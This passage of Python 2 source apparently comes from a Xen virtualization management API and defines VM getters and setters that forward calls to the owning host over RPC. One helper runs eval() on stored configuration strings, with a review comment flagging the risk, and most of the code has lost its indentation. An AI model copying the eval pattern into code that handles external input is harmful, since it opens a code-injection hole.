result = vbd
break
if result:
return xen_api_success(result)
else:
'''
if VM has no media device, create a fake one.
'''
vbd_struct = CD_VBD_DEFAULT_STRUCT
vbd_struct["VM"] = vm_ref
node = XendNode.instance()
if not node.is_fake_media_exists():
vdi = storage._fake_media_auto_create(session).get('Value')
else:
vdi = storage._VDI_get_by_name_label(session, FAKE_MEDIA_NAME).get("Value")
vbd_struct["VDI"] = vdi
return self.VBD_create(session, vbd_struct)
def _VM_get_disks(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
vbds = dom.get_vbds()
result = []
for vbd in vbds:
vbd_type = self.VBD_get_type(session, vbd).get('Value', "")
if cmp(vbd_type, XEN_API_VBD_TYPE[1]) == 0:
result.append(vbd)
return xen_api_success(result)
def VM_media_change(self, session, vm_ref, vdi_name):
'''
@author: wuyuewen
@summary: Change VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vdi_name: VDI's name label.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID, INTERNAL_ERROR
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_media_change(session, vm_ref, vdi_name)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_media_change", vm_ref, vdi_name)
else:
return self._VM_media_change(session, vm_ref, vdi_name)
def _VM_media_change(self, session, vm_ref, vdi_name):
'''
@author: wuyuewen
@summary: Internal method. Change VM's media device(cdrom device).
@param session: session of RPC.
@param vm_ref: uuid
@param vdi_name: VDI's name label.
@return: True | False
@rtype: dict.
@raise xen_api_error: HANDLE_INVALID, INTERNAL_ERROR
'''
vbd_ref = self._VM_get_media(session, vm_ref).get('Value')
xendom = XendDomain.instance()
xennode = XendNode.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
log.debug("No media, create one.")
vbd_struct = CD_VBD_DEFAULT_STRUCT
vbd_struct["VM"] = vm_ref
self.VBD_create(session, vbd_struct)
# return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
cur_vbd_struct = vm.get_dev_xenapi_config('vbd', vbd_ref)
'''
Check the VBD is a media device or not.
'''
if not cur_vbd_struct:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['type'] != XEN_API_VBD_TYPE[0]: # Not CD
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['mode'] != 'RO': # Not read only
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
vdi_uuid = xennode.get_vdi_by_name_label(vdi_name)
new_vdi = xennode.get_vdi_by_uuid(vdi_uuid)
if not new_vdi:
return xen_api_error(['HANDLE_INVALID', 'VDI', vdi_name])
new_vdi_image = new_vdi.get_location()
valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
new_vbd_struct = {}
for k in cur_vbd_struct.keys():
if k in valid_vbd_keys:
new_vbd_struct[k] = cur_vbd_struct[k]
new_vbd_struct['VDI'] = vdi_uuid
try:
XendTask.log_progress(0, 100,
vm.change_vdi_of_vbd,
new_vbd_struct, new_vdi_image)
except XendError, e:
log.exception("Error in VBD_media_change")
# if str(e).endswith("VmError: Device"):
# log.debug("No media create new...")
# log.debug(new_vbd_struct)
# self.VBD_create(session, new_vbd_struct)
return xen_api_error(['INTERNAL_ERROR', str(e)])
# return xen_api_success_void()
return xen_api_success_void()
def VM_get_VTPMs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vtpms())
def VM_get_consoles(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's console device(VNC device).
@param session: session of RPC.
@param vm_ref: uuid
@return: console
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_consoles(vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_consoles", vm_ref)
else:
return self._VM_get_consoles(vm_ref)
def _VM_get_consoles(self, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's console device(VNC device).
@param session: session of RPC.
@param vm_ref: uuid
@return: console
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_consoles())
def VM_get_DPCIs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dpcis())
def VM_get_DSCSIs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dscsis())
def VM_get_DSCSI_HBAs(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_dscsi_HBAs())
def VM_get_tools_version(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return dom.get_tools_version()
def VM_get_metrics(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_metrics())
#frank
def VM_get_cpu_qos(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_cpu_qos())
#frank
def VM_get_network_qos(self, _, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_network_qos())
def VM_get_VCPUs_max(self, _, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's max VCPUs.
@param _: session of RPC.
@param vm_ref: uuid
@return: VCPUs num
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_max(_, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_max', vm_ref)
else:
return self._VM_get_VCPUs_max(_, vm_ref)
def _VM_get_VCPUs_max(self, _, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's max VCPUs.
@param _: session of RPC.
@param vm_ref: uuid
@return: VCPUs num
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.info['VCPUs_max'])
    def VM_get_VCPUs_at_startup(self, _, vm_ref):
        '''
        @deprecated: not used
        '''
        # NOTE(review): dom is fetched only for its side effect of validating
        # vm_ref; the result is discarded and a todo marker is returned.
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        return xen_api_todo()
def VM_get_VCPUs_CPU(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VCPUs' bounding CPUs.
@param session: session of RPC.
@param vm_ref: uuid
@return: VCPUs-CPUs dict.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_CPU(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_CPU', vm_ref)
else:
return self._VM_get_VCPUs_CPU(session, vm_ref)
def _VM_get_VCPUs_CPU(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VCPUs' bounding CPUs.
@param session: session of RPC.
@param vm_ref: uuid
@return: VCPUs-CPUs dict.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getVCPUsCPU())
def VM_get_ip_addr(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's ip address.
@precondition: VM must install VM-tools first.
@param session: session of RPC.
@param vm_ref: uuid
@return: IPv4 address.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_ip_addr(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_ip_addr', vm_ref)
else:
return self._VM_get_ip_addr(session, vm_ref)
def _VM_get_ip_addr(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's ip address.
@precondition: VM must install VM-tools first.
@param session: session of RPC.
@param vm_ref: uuid
@return: IPv4 address.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getDomainIp())
def VM_get_MAC(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's MAC address.
@precondition: has a VIF device.
@param session: session of RPC.
@param vm_ref: uuid
@return: MAC address.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_MAC(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_MAC', vm_ref)
else:
return self._VM_get_MAC(session, vm_ref)
def _VM_get_MAC(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's MAC address.
@precondition: has a VIF device.
@param session: session of RPC.
@param vm_ref: uuid
@return: MAC address.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getDomainMAC())
def VM_get_vnc_location(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's VNC location.
@precondition: has a console device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VNC location.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_vnc_location(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_vnc_location', vm_ref)
else:
return self._VM_get_vnc_location(session, vm_ref)
def _VM_get_vnc_location(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's VNC location.
@precondition: has a console device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VNC location.
@rtype: dict.
'''
xendom = XendDomain.instance();
dom = xendom.get_vm_by_uuid(vm_ref)
# consoles = dom.get_consoles()
# vnc_location = "0"
# for console in consoles:
# location = xendom.get_dev_property_by_uuid('console', console, 'location')
# log.debug("vm %s console %s location %s" % (vm_ref, console, location))
# if location.find(".") != -1:
# vnc_location = location
vnc_location = dom.get_console_port()
log.debug('VM(%s) get vnc location (%s)' % (vm_ref, vnc_location))
return xen_api_success(vnc_location)
# attributes (rw)
def VM_get_name_label(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's name label.
@param session: session of RPC.
@param vm_ref: uuid
@return: name label.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_name_label(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_name_label', vm_ref)
else:
return self._VM_get_name_label(session, vm_ref)
def _VM_get_name_label(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's name label.
@param session: session of RPC.
@param vm_ref: uuid
@return: name label.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.getName())
def VM_get_name_description(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's name description.
@param session: session of RPC.
@param vm_ref: uuid
@return: name description.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_name_description(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_name_description', vm_ref)
else:
return self._VM_get_name_description(session, vm_ref)
def _VM_get_name_description(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's name description.
@param session: session of RPC.
@param vm_ref: uuid
@return: name description.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.getNameDescription())
    def VM_get_user_version(self, session, vm_ref):
        '''
        @deprecated: not used
        '''
        # NOTE(review): dom is fetched only for its side effect of validating
        # vm_ref; the result is discarded and a todo marker is returned.
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        return xen_api_todo()
def VM_get_is_a_template(self, session, ref):
'''
@author: wuyuewen
@summary: Get VM is a template or not.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_a_template(session, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_is_a_template', ref)
else:
return self._VM_get_is_a_template(session, ref)
def _VM_get_is_a_template(self, session, ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM is a template or not.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
log.debug('ref:%s' % ref)
try:
return xen_api_success(XendDomain.instance().get_vm_by_uuid(ref).info['is_a_template'])
except KeyError:
return xen_api_error(['key error', ref])
def VM_get_is_local_vm(self, session, ref):
'''
@author: wuyuewen
@summary: Get VM is a local VM(disk file in local storage, not shared) or not.
@param session: session of RPC.
@param ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_local_vm(session, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_is_local_vm', ref)
else:
return self._VM_get_is_local_vm(session, ref)
    def _VM_get_is_local_vm(self, session, ref):
        '''
        @author: wuyuewen
        @summary: Internal method. Get VM is a local VM(disk file in local storage, not shared) or not.
        @param session: session of RPC.
        @param ref: uuid
        @return: True | False.
        @rtype: dict.
        @raise xen_api_error: key error
        '''
        # log.debug('ref:%s' % ref)
        try:
            storage = self._get_BNStorageAPI_instance()
            vdis = storage._VDI_get_by_vm(session, ref).get('Value')
            if vdis:
                # A single non-sharable VDI makes the whole VM "local"; an
                # unresolvable VDI is also treated as local (True).
                for vdi_uuid in vdis:
                    vdi = storage._get_VDI(vdi_uuid)
                    if vdi:
                        sharable = vdi.sharable
                        if not sharable:
                            return xen_api_success(not sharable)
                    else:
                        log.exception('failed to get vdi by vdi_uuid: %s' % vdi_uuid)
                        return xen_api_success(True)
                        # return xen_api_error(['failed to get vdi by vdi_uuid', vdi_uuid])
                # Reached only when every VDI resolved and was sharable, so
                # sharable is guaranteed bound here and the result is False.
                return xen_api_success(not sharable)
            else:
                # No VDIs at all: report non-local.
                log.exception('failed to get vdi by vm: %s' % ref)
                return xen_api_success(False)
                # return xen_api_error(['failed to get vdi by vm',ref])
        except KeyError:
            return xen_api_error(['key error', ref])
        except VDIError:
            return xen_api_success(False)
# # get inner ip of a VM
# def VM_get_inner_ip(self, session, vm_ref):
# ip_map = self.VM_get_ip_map(session, vm_ref).get('Value')
# mac2ip_list = {}
# for mac, ipmap in ip_map.items():
# inner_ip = ipmap.split('@')[0]
# mac2ip_list[mac] = inner_ip
# return xen_api_success(mac2ip_list)
# #Get mapping intranet ip address to outer net ip address.
# def VM_get_ip_map(self, session, vm_ref):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_get_ip_map(session, vm_ref)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_get_ip_map', vm_ref)
# else:
# return self._VM_get_ip_map(session, vm_ref)
#
# def _VM_get_ip_map(self, session, vm_ref):
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# return xen_api_success(dom.get_ip_map())
def VM_get_auto_power_on(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('auto_power_on', session, vm_ref)
def VM_get_memory_dynamic_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's memory dynamic max.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic max(Bytes).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_dynamic_max(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_dynamic_max', vm_ref)
else:
return self._VM_get_memory_dynamic_max(session, vm_ref)
def _VM_get_memory_dynamic_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's memory dynamic max.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic max(Bytes).
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_dynamic_max())
def VM_get_memory_dynamic_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's memory dynamic min.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic min(Bytes).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_memory_dynamic_min(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_get_memory_dynamic_min', vm_ref)
else:
return self._VM_get_memory_dynamic_min(session, vm_ref)
def _VM_get_memory_dynamic_min(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's memory dynamic min.
@param session: session of RPC.
@param vm_ref: uuid
@return: memory dynamic min(Bytes).
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_memory_dynamic_min())
def VM_get_VCPUs_params(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_vcpus_params())
def VM_get_actions_after_shutdown(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_shutdown())
def VM_get_actions_after_reboot(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_reboot())
def VM_get_actions_after_suspend(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_suspend())
def VM_get_actions_after_crash(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_on_crash())
def VM_get_PV_bootloader(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_bootloader', session, vm_ref)
def VM_get_PV_kernel(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_kernel', session, vm_ref)
def VM_get_PV_ramdisk(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_ramdisk', session, vm_ref)
def VM_get_PV_args(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_args', session, vm_ref)
def VM_get_PV_bootloader_args(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('PV_bootloader_args', session, vm_ref)
def VM_get_HVM_boot_policy(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('HVM_boot_policy', session, vm_ref)
def VM_get_HVM_boot_params(self, session, vm_ref):
'''
@deprecated: not used
'''
return self.VM_get('HVM_boot_params', session, vm_ref)
def VM_get_platform(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_platform())
    def VM_get_PCI_bus(self, session, vm_ref):
        '''
        @deprecated: not used
        '''
        # NOTE(review): unlike the sibling getters this returns
        # dom.get_pci_bus() directly instead of wrapping it in
        # xen_api_success() -- confirm whether get_pci_bus already returns
        # an API-shaped dict before "fixing" this.
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        return dom.get_pci_bus()
def VM_get_VCPUs_affinity(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's VCPUs available CPU affinity.
@param session: session of RPC.
@param vm_ref: uuid
@return: dict of CPU affinity.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp (host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_VCPUs_affinity(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_VCPUs_affinity', vm_ref)
else:
return self._VM_get_VCPUs_affinity(session, vm_ref)
def _VM_get_VCPUs_affinity(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's VCPUs available CPU affinity.
@param session: session of RPC.
@param vm_ref: uuid
@return: dict of CPU affinity.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dominfo.getVCPUsAffinity())
def VM_set_VCPUs_affinity(self, session, vm_ref, vcpu, cpumap):
'''
@author: wuyuewen
@summary: Set VM's VCPU available CPU affinity, VCPU can used one of these CPUs.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param vcpu: number of VCPU, if VM has 2 VCPU, then VCPU number is 0 or 1.
@param cpumap: numbers of CPUs, e.g. "0,2,4,8" means CPUs number 0,2,4,8
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp (host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_affinity(session, vm_ref, vcpu, cpumap)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_affinity', vm_ref, vcpu, cpumap)
else:
return self._VM_set_VCPUs_affinity(session, vm_ref, vcpu, cpumap)
def _VM_set_VCPUs_affinity(self, session, vm_ref, vcpu, cpumap):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPU available CPU affinity, VCPU can used one of these CPUs.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param vcpu: number of VCPU, if VM has 2 VCPU, then VCPU number is 0 or 1.
@param cpumap: numbers of CPUs, e.g. "0,2,4,8" means CPUs number 0,2,4,8
@return: True | False.
@rtype: dict.
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
domid = dominfo.getDomid()
if not dominfo:
raise XendInvalidDomain(str(domid))
vcpu = 'cpumap%d' % int(vcpu)
if not domid or cmp(domid, -1) == 0 :
self.VM_add_to_VCPUs_params(session, vm_ref, vcpu, cpumap)
else:
self.VM_add_to_VCPUs_params_live(session, vm_ref, vcpu, cpumap)
# dominfo.setVCPUsAffinity(vcpu, cpumap)
return xen_api_success_void()
def VM_set_PCI_bus(self, session, vm_ref, val):
'''
@deprecated: not used
'''
return self.VM_set('PCI_bus', session, vm_ref, val)
def VM_get_other_config(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM's other config.
@param session: session of RPC.
@param vm_ref: uuid
@return: other config field.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_other_config(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_other_config', vm_ref)
else:
return self._VM_get_other_config(session, vm_ref)
#
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self.VM_get('other_config', session, vm_ref)
# else:
# log.debug("get other config")
# host_ip = BNPoolAPI._host_structs[host_ref]['ip']
# return xen_rpc_call(host_ip, "VM_get_other_config", vm_ref)
# add by wufan 20131016
def _VM_get_other_config(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's other config.
@param session: session of RPC.
@param vm_ref: uuid
@return: other config field.
@rtype: dict.
'''
other_config = self.VM_get('other_config', session, vm_ref).get('Value')
#log.debug('_VM_get_other_config: type%s value%s' % (type(other_config), other_config))
#if other_config :
# tag_list = other_config.get('tag',{})
# if isinstance(tag_list, str):
# self._VM_convert_other_config(session, vm_ref)
# other_config = self.VM_get('other_config', session, vm_ref).get('Value')
return xen_api_success(other_config)
# add by wufan
    def _VM_convert_other_config(self, session, vm_ref):
        '''
        @deprecated: not used
        '''
        # Keys whose string values are expected to encode nested dicts.
        OTHER_CFG_DICT_kEYS = ['tag', 'rate', 'burst']
        convert_other_config = {}
        other_config = self.VM_get('other_config', session, vm_ref).get('Value')
        #log.debug('_VM_get_other_config: type%s value%s' % (type(other_config), other_config))
        if other_config and isinstance(other_config, dict):
            for key, value in other_config.items():
                if key in OTHER_CFG_DICT_kEYS and not isinstance(value, dict):
                    # SECURITY NOTE(review): eval() on stored config text --
                    # fine only if other_config is trusted; do not feed it
                    # externally-supplied strings.
                    value = eval(value)
                    if isinstance(value, dict):
                        convert_other_config.setdefault(key,{})
                        for k, v in value.items():
                            convert_other_config[key][k] = v
                else:
                    # Non-listed keys (and already-dict values) pass through.
                    convert_other_config[key] = value
        self._VM_set_other_config(session, vm_ref, convert_other_config)
        log.debug('_VM_convert_other_config: type%s value%s' % (type(convert_other_config), convert_other_config))
        return xen_api_success_void()
def VM_get_tags(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_tags(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_tags', vm_ref)
else:
return self._VM_get_tags(session, vm_ref)
def _VM_get_tags(self, session, vm_ref):
'''
@deprecated: not used
'''
try:
return self.VM_get('tags', session, vm_ref)
except Exception, exn:
log.exception(exn)
return xen_api_error(exn)
def VM_get_all_tag(self, session, vm_ref, tag_type):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_all_tag(session, vm_ref, tag_type)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_all_tag', vm_ref, tag_type)
else:
return self._VM_get_all_tag(session, vm_ref, tag_type)
def _VM_get_all_tag(self, session, vm_ref, tag_type):
'''
@deprecated: not used
'''
tag_list = {}
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
#log.debug('other_config: %s', other_config)
if other_config:
tag_list = other_config.get(tag_type,{})
log.debug('list:%s' % tag_list)
return xen_api_success(tag_list)
except Exception, exn:
log.exception(exn)
return xen_api_success(tag_list)
def VM_get_tag(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Get VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@return: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_tag(session, vm_ref, vif_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_tag', vm_ref, vif_ref)
else:
return self._VM_get_tag(session, vm_ref, vif_ref)
# original:wuyuewen
#def _VM_get_tag(self, session, vm_ref):
# try:
# other_config = self._VM_get_other_config(session, vm_ref).get('Value')
# tag = "-1"
# if other_config:
# tag = other_config.get('tag', "-1")
# return xen_api_success(tag)
# except Exception, exn:
# log.exception(exn)
# return xen_api_success(tag)
# add by wufan read from VM's other_config
def _VM_get_tag(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VIF's tag(VLAN-ID), this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@return: VIF's tag number(VLAN-ID), default number is -1(VLAN not used).
@rtype: dict.
'''
tag = '-1'
eth_num = '-1'
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
device = self.VIF_get_device(session, vif_ref).get('Value')
if device != '' and device.startswith('eth'):
eth_num = device[3:]
if other_config:
tag_list = other_config.get('tag',{})
#log.debug('tag_list type:%s' % type(tag_list))
tag = tag_list.get(eth_num,'-1')
#log.debug('_VM_get_tag:%s' % tag)
return xen_api_success(tag)
except Exception, exn:
log.exception(exn)
return xen_api_success(tag)
def VM_get_rate(self, session, vm_ref, param_type, vif_ref):
'''
@author: wuyuewen
